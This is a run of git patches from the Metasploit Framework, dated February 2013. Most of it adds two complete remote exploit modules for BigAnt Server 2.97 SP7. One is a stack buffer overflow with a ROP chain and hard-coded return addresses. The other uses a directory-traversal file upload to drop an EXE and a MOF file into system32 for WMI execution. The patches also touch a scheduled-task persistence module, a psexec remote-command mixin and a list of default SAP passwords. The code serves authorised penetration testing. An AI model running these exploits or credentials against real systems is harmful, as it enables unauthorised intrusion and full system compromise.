b/modules/exploits/windows/local/s4u_persistence.rb index 1d5d2cc0bb29..e6197463c52f 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -163,7 +163,7 @@ def create_xml(rexe_path) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue - print_warning("Could not read system time from victim...using your local time to determine expire date") + print_warning("Could not read system time from victim...using your local time to determine creation date") t = ::Time.now end date = t.strftime("%Y-%m-%d") From 1a2a0bc38e44edc2c6dfec5a7e641788ef6962ba Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:21:45 +0100 Subject: [PATCH 408/421] Added module for CVE-2012-6275 --- .../misc/bigant_server_sch_dupf_bof.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb new file mode 100644 index 000000000000..fd560463cd2e --- /dev/null +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -0,0 +1,183 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BigAnt Server SCH And DUPF Buffer Overflow', + 'Description' => %q{ + This exploits a stack buffer overflow in the BigAnt Server 2.97 SP7. The + vulnerability is due to the dangerous usage of strcpy while handling errors. This + module uses a combination of SCH and DUPF request to trigger the vulnerability and + has been tested successfully against version 2.97 SP7 over Windows XP SP3 and + Windows 2003 SP2. + }, + 'Author' => + [ + 'Hamburgers Maccoy', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6275' ], + [ 'US-CERT-VU', '990652' ], + [ 'BID', '57214' ], + [ 'OSVDB', '89344' ] + ], + 'Payload' => + { + 'Space' => 2500, + 'BadChars' => "\x00\x0a\x0d\x25\x27", + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BigAnt Server 2.97 SP7 / Windows XP SP3', + { + 'Offset' => 629, + 'Ret' => 0x77c21ef4, # ppr from msvcrt + 'JmpESP' => 0x77c35459, # push esp # ret from msvcrt + 'FakeObject' => 0x77C60410 # .data from msvcrt + } + ], + [ 'BigAnt Server 2.97 SP7 / Windows 2003 SP2', + { + 'Offset' => 629, + 'Ret' => 0x77bb287a, # ppr from msvcrt + 'FakeObject' => 0x77bf2460, # .data from msvcrt + :callback_rop => :w2003_sp2_rop + } + ] + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 09 2013')) + + register_options([Opt::RPORT(6661)], self.class) + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def w2003_sp2_rop + rop_gadgets = + [ + 0x77bc5d88, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bc5d88, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bc5d88, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bc5d88, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + + return rop_gadgets + end + + def exploit + + sploit = rand_text_alpha(target['Offset']) + sploit << [target.ret].pack("V") + sploit << [target['FakeObject']].pack("V") + sploit << [target['FakeObject']].pack("V") + if target[:callback_rop] and self.respond_to?(target[:callback_rop]) + sploit << self.send(target[:callback_rop]) + else + sploit << [target['JmpESP']].pack("V") + end + sploit << payload.encoded + + random_filename = rand_text_alpha(4) + random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" + random_userid = rand_text_numeric(1) + random_username = rand_text_alpha_lower(5) + random_content = rand_text_alpha(10 + rand(10)) + + sch = "SCH 16\n" + sch << "cmdid: 1\n" + sch << "content-length: 0\n" + sch << "content-type: Appliction/Download\n" + sch << "filename: #{random_filename}.txt\n" + sch << "modified: #{random_date}\n" + sch << "pclassid: 102\n" + sch << "pobjid: 1\n" + sch << "rootid: 1\n" + sch << "sendcheck: 1\n" + sch << "source_cmdname: DUPF\n" + sch << "source_content-length: 116619\n" + sch << "userid: #{random_userid}\n" + sch << "username: #{sploit}\n\n" + + print_status("Trying target #{target.name}...") + + connect + print_status("Sending SCH request...") + sock.put(sch) + res = sock.get_once + if res.nil? + fail_with(Exploit::Failure::Unknown, "No response to the SCH request") + end + if res=~ /scmderid: \{(.*)\}/ + scmderid = $1 + else + fail_with(Exploit::Failure::UnexpectedReply, "scmderid value not found in the SCH response") + end + + dupf = "DUPF 16\n" + dupf << "cmdid: 1\n" + dupf << "content-length: #{random_content.length}\n" + dupf << "content-type: Appliction/Download\n" + dupf << "filename: #{random_filename}.txt\n" + dupf << "modified: #{random_date}\n" + dupf << "pclassid: 102\n" + dupf << "pobjid: 1\n" + dupf << "rootid: 1\n" + dupf << "scmderid: {#{scmderid}}\n" + dupf << "sendcheck: 1\n" + dupf << "userid: #{random_userid}\n" + dupf << "username: #{random_username}\n\n" + dupf << random_content + + print_status("Sending DUPF request...") + sock.put(dupf) + #sock.get_once + disconnect + + end + +end From 31a3a374c3efd9c979a8b0a6f4d5ee6bc72b5daf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:25:39 +0100 Subject: [PATCH 409/421] Added module for CVE-2012-6274 --- .../windows/misc/bigant_server_dupf_upload.rb | 126 ++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 modules/exploits/windows/misc/bigant_server_dupf_upload.rb diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb new file mode 100644 index 000000000000..8f55b2df4cfa --- /dev/null +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BigAnt Server DUPF Command Arbitrary File Upload', + 'Description' => %q{ + This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. + A lack of authentication allows to make unauthenticated file uploads through a DUPF + command. Additionally the filename option in the same command can be used to launch + a directory traversal attack and achieve arbitrary file upload. + + The module uses uses the Windows Management Instrumentation service to execute an + arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It + has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2. + }, + 'Author' => + [ + 'Hamburgers Maccoy', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6274' ], + [ 'US-CERT-VU', '990652' ], + [ 'BID', '57214' ], + [ 'OSVDB', '89342' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BigAnt Server 2.97 SP7', { } ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'WfsDelay' => 10 + }, + 'DisclosureDate' => 'Jan 09 2013')) + + register_options( + [ + Opt::RPORT(6661), + OptInt.new('DEPTH', [true, "Levels to reach base directory", 6]) + ], self.class) + + end + + def upload_file(filename, content) + + random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" + + dupf = "DUPF 16\n" + dupf << "cmdid: 1\n" + dupf << "content-length: #{content.length}\n" + dupf << "content-type: Appliction/Download\n" + dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n" + dupf << "modified: #{random_date}\n" + dupf << "pclassid: 102\n" + dupf << "pobjid: 1\n" + dupf << "rootid: 1\n" + dupf << "sendcheck: 1\n\n" + dupf << content + + print_status("sending DUPF") + connect + sock.put(dupf) + res = sock.get_once + disconnect + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + # Setup the necessary files to do the wbemexec trick + exe_name = rand_text_alpha(rand(10)+5) + '.exe' + exe = generate_payload_exe + mof_name = rand_text_alpha(rand(10)+5) + '.mof' + mof = generate_mof(mof_name, exe_name) + + print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) + if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ + print_good("#{peer} - #{exe_name} uploaded successfully") + else + if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ + print_error("#{peer} - Upload failed, check the DEPTH option") + end + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") + end + + print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) + if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ + print_good("#{peer} - #{mof_name} uploaded successfully") + register_file_for_cleanup(exe_name) + register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") + else + if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ + print_error("#{peer} - Upload failed, check the DEPTH option") + end + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") + end + + end + +end From 322fa53d490b007164229f0ae3ef1874b72744bd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:29:41 +0100 Subject: [PATCH 410/421] fix typo --- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index 8f55b2df4cfa..bed756cb52aa 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -26,7 +26,8 @@ def initialize(info = {}) The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It - has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2. + has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 + SP2. }, 'Author' => [ From 25f8a7dcb9d39ff975d8daf1eeff83646438716d Mon Sep 17 00:00:00 2001 From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Sun, 17 Feb 2013 22:35:52 -0500 Subject: [PATCH 411/421] Fix expire tag logic and slight clean up Was a dumbass again and didn't fully understand how Optints worked when left blank at run time. If not 0 the expire tag will be inserted now. Also made it print the xpath if used because I believe it will be of value to the user for trouble shooting. --- .../exploits/windows/local/s4u_persistence.rb | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index e6197463c52f..5eaad52e4db3 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,7 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], - 'DisclosureDate' => [ 'Jan 2 2013' ], + 'DisclosureDate' => [ 'Jan 2 2013' ], # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -207,8 +207,9 @@ def add_xml_triggers(xml) if not datastore['XPATH'].nil? # Append xpath queries line << " and #{datastore['XPATH']}" + # Print XPath query, useful to user to spot issues with uncommented single quotes + print_status("XPath query: #{line}") end - vprint_status("XPath query: #{line}") xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) @@ -222,12 +223,15 @@ def add_xml_triggers(xml) end xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<") - # Generate expire tag - end_boundary = create_expire_tag if datastore['EXPIRE_TIME'] + # Insert expire tag if not 0 + unless datastore['EXPIRE_TIME'] == 0 + # Generate expire tag + end_boundary = create_expire_tag - # Inject expire tag - insert = xml.index("</StartBoundary>") - xml.insert(insert + 16, "\n #{end_boundary}") + # Inject expire tag + insert = xml.index("</StartBoundary>") + xml.insert(insert + 16, "\n #{end_boundary}") + end end return xml end @@ -266,7 +270,7 @@ def create_trigger_tags(trig, xml) # Create session state trigger, weird spacing used to maintain # natural Winadows spacing for XML export temp_xml = "<SessionStateChangeTrigger>\n" - temp_xml << " #{create_expire_tag}" if not datastore['EXPIRE_TIME'] + temp_xml << " #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <StateChange>#{trig}</StateChange>\n" temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n" @@ -286,7 +290,7 @@ def create_trigger_event_tags(log, line, xml) # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # used to maintain natural Windows spacing for XML export temp_xml = "<EventTrigger>\n" - temp_xml << " #{create_expire_tag}\n" if not datastore['EXPIRE_TIME'] + temp_xml << " #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <Subscription><QueryList><Query Id=\"0\" " temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" From 416a7aeaa3bfe064a65759c1313a12f9ef058892 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:23:06 +0100 Subject: [PATCH 412/421] make msftidy happy for s4u_persistence --- modules/exploits/windows/local/s4u_persistence.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 5eaad52e4db3..188b8e643c28 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,7 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], - 'DisclosureDate' => [ 'Jan 2 2013' ], # Date of scriptjunkie's blog post + 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -141,7 +141,6 @@ def upload_rexe(path, payload) begin write_file(path, payload) rescue => e - puts e fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") @@ -152,7 +151,7 @@ def upload_rexe(path, payload) # Returns normal XML for generic task def create_xml(rexe_path) - xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence") + xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_file = File.new(xml_path,"r") xml = xml_file.read xml_file.close @@ -204,7 +203,7 @@ def add_xml_triggers(xml) when 'event' line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" - if not datastore['XPATH'].nil? + if not datastore['XPATH'].nil? and not datastore['XPATH'].empty? # Append xpath queries line << " and #{datastore['XPATH']}" # Print XPath query, useful to user to spot issues with uncommented single quotes @@ -226,8 +225,7 @@ def add_xml_triggers(xml) # Insert expire tag if not 0 unless datastore['EXPIRE_TIME'] == 0 # Generate expire tag - end_boundary = create_expire_tag - + end_boundary = create_expire_tag # Inject expire tag insert = xml.index("</StartBoundary>") xml.insert(insert + 16, "\n #{end_boundary}") From c8778587f5233f49eb0f86cb15e2e018bb66daa8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:25:03 +0100 Subject: [PATCH 413/421] rename the xml template for s4u --- data/exploits/{s4u_persistence => s4u_persistence.xml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename data/exploits/{s4u_persistence => s4u_persistence.xml} (100%) diff --git a/data/exploits/s4u_persistence b/data/exploits/s4u_persistence.xml similarity index 100% rename from data/exploits/s4u_persistence rename to data/exploits/s4u_persistence.xml From 9af43bc05c4b98d4cabe616579a07eb34399eccd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:58:29 +0100 Subject: [PATCH 414/421] newline to sap_default.txt --- data/wordlists/sap_default.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 2102fd069bf3..fc64ceb34b36 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -14,4 +14,5 @@ J2EE_ADMIN ch4ngeme SAPJSF ch4ngeme SAPR3 SAP CTB_ADMIN sap123 -XMI_DEMO sap123 \ No newline at end of file +XMI_DEMO sap123 + From b72d2b59f84ae70978f416c65cf303f5fa3007f0 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 18 Feb 2013 18:02:51 -0600 Subject: [PATCH 415/421] Add logging in case of exceptions during rm --- lib/msf/core/exploit/file_dropper.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 6298354b6795..12ef03efb204 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -56,7 +56,7 @@ def on_new_session(session) # # Record file as needing to be cleaned up # - # @param [Array<String>] files List of paths on the target that should + # @param files [Array<String>] List of paths on the target that should # be deleted during cleanup. Each filename should be either a full # path or relative to the current working directory of the session # (not necessarily the same as the cwd of the server we're @@ -95,7 +95,9 @@ def cleanup true #rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e rescue ::Exception => e - vprint_error("Failed to delete #{file}: #{e.to_s}") + vprint_error("Failed to delete #{file}: #{e}") + elog("Failed to delete #{file}: #{e.class}: #{e}") + elog("Call stack:\n#{e.backtrace.join("\n")}") false end end From 867ab2f269365d7c0de0591c2a96e64c7928d5d9 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 18 Feb 2013 19:01:03 -0600 Subject: [PATCH 416/421] Whitespace --- lib/rex/proto/smb/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d54e..72c35379fbf0 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1899,7 +1899,7 @@ def find_first(path) resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end From 49f00acc1187f38a55fcaa5cd31b081575dc19b3 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 11:24:05 -0600 Subject: [PATCH 417/421] Fix nil deref when dnsdomain is empty --- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 7ed1b96f4dca..ca6c2f5c2f74 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -164,8 +164,10 @@ def check_hku_entry(key, ip, smbshare, cmd, text, bat) print_good("#{peer} - #{user}") report_user(user.chomp) else - if username = query_session(smbshare, ip, cmd, text, bat) - user = dnsdomain.split(" ")[2].split(".")[0].to_s + "\\" + username.to_s + username = query_session(smbshare, ip, cmd, text, bat) + if username + hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." + user = "#{hostname}\\#{username}" print_good("#{peer} - #{user}") report_user(user.chomp) else @@ -175,7 +177,7 @@ def check_hku_entry(key, ip, smbshare, cmd, text, bat) else print_status("#{peer} - Could not determine logged in users") end - rescue StandardError => check_error + rescue Rex::Proto::SMB::Exceptions::Error => check_error print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") return check_error end From 9813c815efbe371ca711890ba84b636ca9fa0233 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 19 Feb 2013 11:40:06 -0600 Subject: [PATCH 418/421] Minor changes --- .../exploits/windows/misc/bigant_server_sch_dupf_bof.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index fd560463cd2e..f72d6c171d24 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -14,15 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'BigAnt Server SCH And DUPF Buffer Overflow', + 'Name' => 'BigAnt Server 2 SCH And DUPF Buffer Overflow', 'Description' => %q{ - This exploits a stack buffer overflow in the BigAnt Server 2.97 SP7. The + This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This - module uses a combination of SCH and DUPF request to trigger the vulnerability and + module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2. }, - 'Author' => + 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module From 5108e8ef1ce3c7432eb85c8cc2de4d4fb803dac5 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 19 Feb 2013 11:44:41 -0600 Subject: [PATCH 419/421] Correct tab --- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index bed756cb52aa..769d2e22527c 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -29,7 +29,7 @@ def initialize(info = {}) has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. }, - 'Author' => + 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module From ede804e6affa6ae24e8c62a22e01430b3e6d6aed Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 12:33:19 -0600 Subject: [PATCH 420/421] Make psexec mixin a bit better * Removes copy-pasted code from psexec_command module and uses the mixin instead * Uses the SMB protocol to delete files rather than psexec'ing to call cmd.exe and del * Replaces several instances of "rescue StandardError" with better exception handling so we don't accidentally swallow things like NoMethodError * Moves file reading and existence checking into the Exploit::SMB mixin --- lib/msf/core/exploit/psexec.rb | 139 ++++------- lib/msf/core/exploit/smb.rb | 66 +++++- modules/auxiliary/admin/smb/psexec_command.rb | 219 ++++-------------- 3 files changed, 148 insertions(+), 276 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index f63a93f8e160..58e678869595 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -1,11 +1,14 @@ require 'msf/core' +require 'msf/core/exploit/dcerpc' module Msf #### -# This module alows for reuse of the psexec code execution module -# This code was stolen straight out of psexec.rb.Thanks very much for all -# who contributed to that module!! Instead of uploading and runing a binary. +# Allows for reuse of the psexec code execution technique +# +# This code was stolen straight out of the psexec module. Thanks very +# much for all who contributed to that module!! Instead of uploading +# and runing a binary. #### module Exploit::Remote::Psexec @@ -13,34 +16,42 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) + # @param host [String] Remote host to connect to, as an IP address or + # hostname + # @param file [String] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return [String,nil] output or nil on failure + def smb_read_file(smbshare, host, file) begin - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + simple.connect("\\\\#{host}\\#{smbshare}") + file = simple.open(file, 'ro') + contents = file.read + file.close + simple.disconnect("\\\\#{host}\\#{smbshare}") + return contents + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") return nil end end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # echo it to a .txt file and then use the {#smb_read_file} method to + # retrieve it. Make sure to remove the files manually or use + # {Exploit::FileDropper#register_files_for_cleanup} to have the + # {Exploit::FileDropper#cleanup} and + # {Exploit::FileDropper#on_new_session} handlers do it for you. + # + # @todo Figure out the actual exceptions this needs to deal with + # instead of all the ghetto "rescue ::Exception" madness # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] Whether everything went well def psexec(command) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -49,8 +60,7 @@ def psexec(command) vprint_status("#{peer} - Bound to #{handle} ...") vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) begin response = dcerpc.call(0x0f, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -66,19 +76,19 @@ def psexec(command) svc_handle = nil svc_status = nil stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password begin vprint_status("#{peer} - Creating the service...") response = dcerpc.call(0x0c, stubdata) @@ -97,8 +107,7 @@ def psexec(command) end vprint_status("#{peer} - Opening service...") begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + stubdata = scm_handle 